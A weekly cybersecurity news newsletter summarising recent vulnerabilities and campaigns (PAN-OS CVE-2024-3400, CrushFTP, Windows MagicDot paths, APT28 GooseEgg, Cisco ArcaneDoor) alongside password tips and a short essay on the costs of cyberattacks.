Good Morning and Happy Friday - Your weekly sip of the latest in cybersecurity from the Cybersec Cafe: Palo Alto continues to be threatened. Cyberattacks are expensive and on the rise. Is Android really safe?

Palo Alto Networks PAN-OS Vulnerability Threatens Global Networks

Since last week, a critical security flaw, CVE-2024-3400, affecting PAN-OS versions 10.2, 11.0, and 11.1, has been actively exploited by threat actors, prompting Palo Alto Networks to issue urgent patches. The vulnerability, a combination of two bugs, allows unauthenticated remote shell command execution, posing significant risks to organizations. Dubbed "Operation MidnightEclipse," the exploitation involves a two-stage attack leveraging specially crafted requests and a backdoor named UPSTYLE. Despite initial requirements for firewall configurations and device telemetry, new findings reveal bypasses, expanding the scope of affected systems. Palo Alto Networks has extended patches to various maintenance releases and urges immediate hotfix application to mitigate potential threats. With proof-of-concept exploit code available and federal directives from CISA, swift action is imperative to secure vulnerable devices.

Did You Know?

1. Password Hygiene is Just as Important as Physical Hygiene…
   Except it’s generally forgotten (unlike your physical hygiene, right?). Best practice is not to use the same password for all accounts and to ensure each is unique. We all know this, but does anyone actually do it? Here are some password tips:

   1. Use a Passphrase, not a Password (12-16 characters)

   2. Don’t use any personal information

   3. Store passwords in a password manager

2. Hiding in Plain Sight
   Malware hackers employ ingenious methods to conceal their activities. This could involve renaming legitimate files and embedding a malicious payload within a file that appears to be an error log. They utilize a range of tactics to obfuscate the attack, such as disguising an existing scheduled task and altering the names of legitimate files and the payload stored within them. Think twice the next time you download that file from the email address you don’t recognize.

3. Apple > Android?
   Whether you’re team Apple or team Android, it’s clear that Android platforms are viewed as the more vulnerable target in the realm of cybersecurity. For example, downloading applications from untrustworthy sources can leave smartphones susceptible to viruses and cybercrime, and Android app stores don’t have as intensive of a vetting process for their applications. Moreover, lax app permissions can provide attackers with opportunities to pilfer sensitive data and exploit mobile payment gateways. Be weary of downloading applications that aren’t highly rated or from known companies.

Update Your CrushFTP Software Now

A serious security flaw in CrushFTP enterprise file transfer software, discovered by Simon Garrelou of Airbus CERT, has prompted urgent calls for users to update to the latest version, v11.1.0. The vulnerability, present in CrushFTP v11 versions below 11.1, allows users to escape their Virtual File System (VFS) and download system files, potentially leading to unauthorized access and data breaches. Although instances operating within DMZ environments are protected, CrowdStrike reports targeted exploitation of the flaw, particularly affecting U.S. entities. CrushFTP founder Ben Spink assures swift action in patching the vulnerability and urges customers to prioritize updating to safeguard against potential attacks.

This week at the Cybersec Cafe…

Reflected Cross-Site Scripting (XSS): WWWWWH?

Tired of learning theory behind Cross-Site Scripting and want to understand how to weaponize it in the real world?

This weeks article explains exactly the Who, What, When, Where, Why, and How of Reflected Cross-Site Scripting.

Windows Path Conversion Vulnerability Enables Rootkit-Like Capabilities

Recent research has unveiled a critical security flaw in Windows' DOS-to-NT path conversion process, empowering threat actors with rootkit-like abilities to obfuscate and mimic files, directories, and processes. Discovered by SafeBreach security researcher Or Yair and presented at the Black Hat Asia conference, the flaw stems from the conversion process stripping trailing dots and spaces, enabling unprivileged users to exploit "MagicDot paths" for malicious activities without administrative privileges. These capabilities include concealing files and processes, influencing prefetch file analysis, and deceiving security tools like Task Manager and Process Explorer. Furthermore, the underlying issue has led to the discovery of multiple security vulnerabilities, including elevation of privilege (EoP) and remote code execution (RCE) flaws, highlighting the pervasive risk posed by seemingly innocuous issues. Microsoft has addressed some vulnerabilities but remains vigilant as these issues could impact not only Windows but also other software ecosystems.

Worth the Read

1. American Football fan? Well you might remember a few years back when the Jaguars jumbotron kept glitching out multiple weeks in a row. Turns out it was more than just a glitch, and instead an attacker leveraging remote access in the TeamViewer software. But the team was able to outsmart him—here’s how they caught him and the spiral that ensued, resulting in a 220 year sentence.

2. Worried about Bitcoin scams? Here’s a great article going into depth about one that claims to have over $4 million in Bitcoin. They walk you through the steps they went through to check the legitimacy of this sophisticated scam, and the red flags they found along the way.

APT28 Exploits Windows Print Spooler Flaw with GooseEgg Malware

APT28, also known as Fancy Bear or Forest Blizzard, has recently exploited a security vulnerability (CVE-2022-38028) in the Microsoft Windows Print Spooler component to deploy a custom malware named GooseEgg, allowing for privilege escalation. This attack targeted government, non-governmental, education, and transportation organizations in Ukraine, Western Europe, and North America. GooseEgg, described as a simple launcher application, enables APT28 to execute commands with elevated permissions for activities like remote code execution, backdoor installation, and lateral movement within compromised networks. Associated with the Russian military intelligence agency GRU, APT28 has been active for nearly 15 years, focusing on intelligence collection aligned with Russian foreign policy goals. Concurrently, IBM X-Force has detected new phishing campaigns by the Gamaredon actor targeting Ukraine and Poland, deploying various iterations of the GammaLoad malware, indicating an escalation in actor resources and operational tempo orchestrated by Hive0051.

Your Thoughts?

What is the True Cost of Cyberattacks?

As we rapidly approach 2025, the global cost of cybercrime will have increased 3.5x in the past decade, up from $3 trillion to an estimated $10.5 trillion come next year. While many tend to focus on how the cyberattack happened and the revenue loss that happened as a result, I want to explore the other costs that happen as a result of a cyberattack.

1. Tainted Reputation: The disruption can cause relationships to strain with customers, partners, and supplies. Trust is a difficult thing to gain back for a company once shattered, and many companies are 1 breach away from potentially complete downfall.

2. Fines: Data breaches can violate privacy regulations, thus resulting in massive fines. Depending on the breach and scope, the amounts will vary. But one thing is certain: a rise in insurance premiums moving forward.

3. Tools: What tools in place need to be updated, replaced, or purchased to fill a gap? This will take time to identify gaps and determine the best way to fill them.

4. Manpower: Does a data breach mean you need to hire a full time security team? Does more in-depth training need to occur to prevent future attacks? This increase in time spent preventing the next breach will decrease the time spent working on other, potentially revenue driving projects.

The cost of cyberattacks will undoubtedly keep increasing. Hopefully, the talent to prevent them will continue to expand with it. What do you think? Is there anything I missed?

Leave a comment

State-Sponsored Actors Exploit Cisco Zero-Days for Covert Malware Deployment

A previously unidentified state-sponsored actor, UAT4356 (also known as Storm-1849 by Microsoft), orchestrated a sophisticated campaign named ArcaneDoor, exploiting two zero-day vulnerabilities in Cisco networking equipment to deploy custom malware, including backdoors named "Line Runner" and "Line Dancer." These implants facilitated a range of malicious activities, such as configuration modifications, reconnaissance, network traffic capture/exfiltration, and potential lateral movement within targeted environments. The vulnerabilities exploited, CVE-2024-20353 and CVE-2024-20359, impact Cisco Adaptive Security Appliance and Firepower Threat Defense Software, with one enabling denial-of-service attacks and the other allowing local code execution with root privileges. Despite the exact initial access pathway remaining unclear, UAT4356 began preparations as early as July 2023, demonstrating meticulous efforts to conceal its activities and evade detection. This incident underscores the growing targeting of edge devices by threat actors and emphasizes the need for timely patching, hardware/software updates, and enhanced security monitoring of network infrastructure.

Securely Yours,

The Cybersec Cafe

Just a heads up, The Cybersec Cafe's got a pretty cool weekly cadence.

Every week, expect to dive into the hacker’s mindset in our Methodology Walkthroughs or explore Deep Dive articles on various cybersecurity topics.

. . .

Oh, and if you want even more content and updates, hop over to Ryan G. Cox on Twitter/X or my Website. Can't wait to keep sharing and learning together!